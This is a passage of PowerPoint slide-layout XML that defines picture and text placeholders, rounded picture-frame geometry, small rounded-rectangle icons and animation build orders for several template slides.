        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225121" y="1877692"/>
            <a:ext cx="2497151" cy="2247436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47" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078903" y="4267391"/>
            <a:ext cx="2497151" cy="259199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2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48" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078903" y="4562173"/>
            <a:ext cx="2497151" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="74"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078903" y="1877692"/>
            <a:ext cx="2497151" cy="2247436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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69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/>
      <p:bldP spid="3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/>
      <p:bldP spid="3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3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6" grpId="0"/>
      <p:bldP spid="47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7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9" grpId="0"/>
    </p:bld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ircle images with ca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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838451" y="1813942"/>
            <a:ext cx="2986616" cy="259199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2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42" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838451" y="2108723"/>
            <a:ext cx="2986616" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603252" y="1801491"/>
            <a:ext cx="2028477" cy="1825630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23" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8589435" y="1813942"/>
            <a:ext cx="2986616" cy="259199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2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24" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8589435" y="2108723"/>
            <a:ext cx="2986616" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/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sz="quarter" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354236" y="1801491"/>
            <a:ext cx="2028477" cy="1825630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69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838451" y="3993262"/>
            <a:ext cx="2986616" cy="259199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2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28" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838451" y="4288043"/>
            <a:ext cx="2986616" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/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sz="quarter" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603252" y="3980811"/>
            <a:ext cx="2028477" cy="1825630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30" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8589435" y="3993262"/>
            <a:ext cx="2986616" cy="259199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2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31" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8589435" y="4288043"/>
            <a:ext cx="2986616" cy="151858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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="74"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354236" y="3980811"/>
            <a:ext cx="2028477" cy="1825630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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69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/>
      <p:bldP spid="23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/>
      <p:bldP spid="27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/>
      <p:bldP spid="30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3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/>
    </p:bld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ght circle imag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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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41" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603252" y="3383781"/>
            <a:ext cx="2038349" cy="259199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2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25" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575738" y="1374772"/>
            <a:ext cx="2111999" cy="1900799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36" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3617386" y="3383781"/>
            <a:ext cx="2038349" cy="259199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2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38" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3589871" y="1374772"/>
            <a:ext cx="2111999" cy="1900799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39" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546852" y="3383781"/>
            <a:ext cx="2038349" cy="259199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2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43" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519338" y="1374772"/>
            <a:ext cx="2111999" cy="1900799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44" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9537702" y="3383781"/>
            <a:ext cx="2038349" cy="259199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2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46" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="74"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9510187" y="1374772"/>
            <a:ext cx="2111999" cy="1900799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59" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603252" y="6005061"/>
            <a:ext cx="2038349" cy="259199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2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60" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="76"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524938" y="3996052"/>
            <a:ext cx="2111999" cy="1900799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61" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="77" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3617386" y="6005061"/>
            <a:ext cx="2038349" cy="259199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2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62" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="78"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539071" y="3996052"/>
            <a:ext cx="2111999" cy="1900799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63" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="79" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546852" y="6005061"/>
            <a:ext cx="2038349" cy="259199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2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64" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="80"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6468538" y="3996052"/>
            <a:ext cx="2111999" cy="1900799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65" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="81" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9537702" y="6005061"/>
            <a:ext cx="2038349" cy="259199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2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66" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="82"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9459387" y="3996052"/>
            <a:ext cx="2111999" cy="1900799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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="79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3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="90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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="101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/>
      <p:bldP spid="3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8" grpId="0"/>
      <p:bldP spid="3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3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3" grpId="0"/>
      <p:bldP spid="44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6" grpId="0"/>
      <p:bldP spid="5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/>
      <p:bldP spid="6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1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6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2" grpId="0"/>
      <p:bldP spid="63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3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6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4" grpId="0"/>
      <p:bldP spid="6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5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6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6" grpId="0"/>
    </p:bld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images with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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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25" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632886" y="1356361"/>
            <a:ext cx="1940981" cy="3249925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455736" h="2708271">
                <a:moveTo>
                  <a:pt x="268845" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1186891" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335370" y="0"/>
                  <a:pt x="1455736" y="120366"/>
                  <a:pt x="1455736" y="268845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1455736" y="2642626"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1455736" y="2661186"/>
                  <a:pt x="1453855" y="2679307"/>
                  <a:pt x="1450274" y="2696808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1446716" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9020" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462" y="2696808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1881" y="2679307"/>
                  <a:pt x="0" y="2661186"/>
                  <a:pt x="0" y="2642626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="268845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="120366"/>
                  <a:pt x="120366" y="0"/>
                  <a:pt x="268845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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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1" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622447" y="4606285"/>
            <a:ext cx="1938573" cy="243840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1453930" h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442258" y="37601"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1401097" y="134917"/>
                  <a:pt x="1304736" y="203200"/>
                  <a:pt x="1192427" y="203200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261503" y="203200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149194" y="203200"/>
                  <a:pt x="52834" y="134917"/>
                  <a:pt x="11672" y="376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Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="65"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800352" y="1356361"/>
            <a:ext cx="1940981" cy="3249925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455736" h="2708271">
                <a:moveTo>
                  <a:pt x="268845" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1186891" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335370" y="0"/>
                  <a:pt x="1455736" y="120366"/>
                  <a:pt x="1455736" y="268845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1455736" y="2642626"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1455736" y="2661186"/>
                  <a:pt x="1453855" y="2679307"/>
                  <a:pt x="1450274" y="2696808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1446716" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9020" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462" y="2696808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1881" y="2679307"/>
                  <a:pt x="0" y="2661186"/>
                  <a:pt x="0" y="2642626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="268845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="120366"/>
                  <a:pt x="120366" y="0"/>
                  <a:pt x="268845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37" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2789914" y="4606285"/>
            <a:ext cx="1938573" cy="243840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1453930" h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442258" y="37601"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1401097" y="134917"/>
                  <a:pt x="1304736" y="203200"/>
                  <a:pt x="1192427" y="203200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261503" y="203200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149194" y="203200"/>
                  <a:pt x="52834" y="134917"/>
                  <a:pt x="11672" y="3760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Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5065332" y="1356361"/>
            <a:ext cx="1940981" cy="3249925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455736" h="2708271">
                <a:moveTo>
                  <a:pt x="268845" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1186891" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335370" y="0"/>
                  <a:pt x="1455736" y="120366"/>
                  <a:pt x="1455736" y="268845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1455736" y="2642626"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1455736" y="2661186"/>
                  <a:pt x="1453855" y="2679307"/>
                  <a:pt x="1450274" y="2696808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1446716" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9020" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462" y="2696808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1881" y="2679307"/>
                  <a:pt x="0" y="2661186"/>
                  <a:pt x="0" y="2642626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="268845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="120366"/>
                  <a:pt x="120366" y="0"/>
                  <a:pt x="268845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39" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5054894" y="4606285"/>
            <a:ext cx="1938573" cy="243840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1453930" h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442258" y="37601"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1401097" y="134917"/>
                  <a:pt x="1304736" y="203200"/>
                  <a:pt x="1192427" y="203200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261503" y="203200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149194" y="203200"/>
                  <a:pt x="52834" y="134917"/>
                  <a:pt x="11672" y="3760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Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="67"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7351332" y="1356361"/>
            <a:ext cx="1940981" cy="3249925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455736" h="2708271">
                <a:moveTo>
                  <a:pt x="268845" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1186891" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335370" y="0"/>
                  <a:pt x="1455736" y="120366"/>
                  <a:pt x="1455736" y="268845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1455736" y="2642626"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1455736" y="2661186"/>
                  <a:pt x="1453855" y="2679307"/>
                  <a:pt x="1450274" y="2696808"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1446716" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9020" y="2708271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5462" y="2696808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1881" y="2679307"/>
                  <a:pt x="0" y="2661186"/>
                  <a:pt x="0" y="2642626"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="268845"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="120366"/>
                  <a:pt x="120366" y="0"/>
                  <a:pt x="268845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41" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7340894" y="4606285"/>
            <a:ext cx="1938573" cy="243840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1453930" h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1453930" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442258" y="37601"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1401097" y="134917"/>
                  <a:pt x="1304736" y="203200"/>
                  <a:pt x="1192427" y="203200"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="261503" y="203200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149194" y="203200"/>
                  <a:pt x="52834" y="134917"/>
                  <a:pt x="11672" y="3760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2" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9624486" y="1356361"/>
            <a:ext cx="1940981" cy="3249925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455736" h="2708271">
                <a:moveTo>
                  <a:pt x="268845" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1186891" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1335370" y="0"/>
                  <a:pt x="1455736" y="120366"/>
                  <a:pt x="1455736" y="268845"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1455736" y="2642626"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1455736" y="2661186"/>
                  <a:pt x="1453855" y="2679307"/>
